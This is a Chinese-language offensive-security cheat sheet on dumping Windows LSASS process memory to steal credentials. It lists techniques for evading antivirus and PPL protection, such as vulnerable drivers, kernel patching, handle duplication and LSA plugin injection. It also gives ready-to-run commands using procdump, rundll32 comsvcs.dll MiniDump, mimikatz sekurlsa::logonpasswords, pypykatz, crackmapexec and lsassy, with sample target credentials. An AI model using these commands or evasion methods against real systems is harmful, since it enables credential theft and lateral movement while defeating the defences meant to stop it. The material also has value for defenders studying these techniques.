lsass dump内存对抗

lsass dump

原理篇

API

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass

dbghelp.dll中的MiniDumpWriteDump

• NtReadVirtualMemory

  MiniDumpWriteDump + PssCaptureSnapshot

  https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass

通过有漏洞的驱动程序，从内核层读取lsass内存

• EDRSandblast

https://github.com/wavestone-cdt/EDRSandblast

对抗篇

Windows Defender 将终止任何试图转储 LSASS 的 PowerShell 进程，因此为此使用 CMD 或 .net 工具而不是 PowerShell 很重要。

利用RtlReportSilentProcessExit API

https://github.com/deepinstinct/LsassSilentProcessExit

使用shellcode来转存lsass

https://lengjibo.github.io/lassdump/

注入lsass

https://github.com/M-r-J-o-h-n/LSASS-injector/blob/master/LsassInjector/LsassInjector.cpp

重启系统到 安全模式

bypass PPL

删除 RunAsPPL 注册表项并重新启动（可能是最糟糕的方法，因为您将丢失内存中的任何凭据） 通过修补 EPROCESS 内核结构禁用 LSASS 进程上的 PPL 标志 直接读取 LSASS 进程内存内容，而不是使用打开的进程函数 https://github.com/RedCursorSecurityConsulting/PPLKiller

Seclogon: 滥用泄露的句柄 dump lsass

https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html https://github.com/antonioCoco/MalSeclogon

重用已打开的lsass进程句柄，NtDuplicateObject

https://skelsec.medium.com/duping-av-with-handles-537ef985eb03

加载一个lsa插件

https://www.pentestpartners.com/security-blog/dumping-lsass-in-memory-undetected-using-mirrordump/ https://www.ired.team/offensive-security/credential-access-and-credential-dumping/intercepting-logon-credentials-via-custom-security-support-provider-and-authentication-package
利用fork来dump lsass
https://github.com/D4stiny/ForkPlayground

工具篇

微软签名工具

• ProcDump

-ma，带-r和不带-r procdump.exe -accepteula -ma lsass.exe lsass.dmp // or avoid reading lsass by dumping a cloned lsass process procdump.exe -accepteula -r -ma lsass.exe lsass.dmp

• 任务管理器
• procExp
• SQLDumper

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/

• comsvcs.dll

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/dump-credentials-from-lsass-process-without-mimikatz .\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full 用具有调试权限的进程，例如:powershell.exe https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/ https://en.hackndo.com/remote-lsass-dump-passwords/

• CreateDump.exe （.net5）

其他签名工具

• Process Hacker
• ProcessDump.exe（Cisco Jabber）

cd c:\program files (x86)\cisco systems\cisco jabber\x64\ processdump.exe (ps lsass).id c:\temp\lsass.dmp

• Avdump.exe (avast antivirus product 组件)
• WinPmem（google签名）/physmem2profit

https://labs.f-secure.com/blog/rethinking-credential-theft/

• hiberfil.sys/RawCopy

https://github.com/jschicht/RawCopy https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps

• VMEM/VMSN

https://diverto.github.io/2019/11/05/Extracting-Passwords-from-hiberfil-and-memdumps

其他工具

• mimikatz

sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP sekurlsa::logonpasswords

• Pypykatz

pypykatz lsa minidump lsass.DMP

• Crackmapexec

crackmapexec smb 192.168.0.76 -u testadmin -p Password123 —lsa

• Lsassy

lsassy -d test.lab -u testadmin -p Password123 192.168.0.76 crackmapexec smb 192.168.0.76 -u testadmin -p Password123 -M lsassy https://cloud.tencent.com/developer/article/1576465

• ShapDump

https://medium.com/@markmotig/research-and-organization-on-the-go-and-refinement-when-time-permits-3d25763d3586

• DumpErt

https://github.com/outflanknl/Dumpert

• Out_Minidump.ps1

https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1

• nanodump
  https://github.com/helpsystems/nanodump

其他收集

https://wbglil.github.io/2021/02/19/MiniDumpWriteDump%E6%9D%82%E8%AE%B0/ https://github.com/post-cyberlabs/Offensive_tools/tree/main/PostDump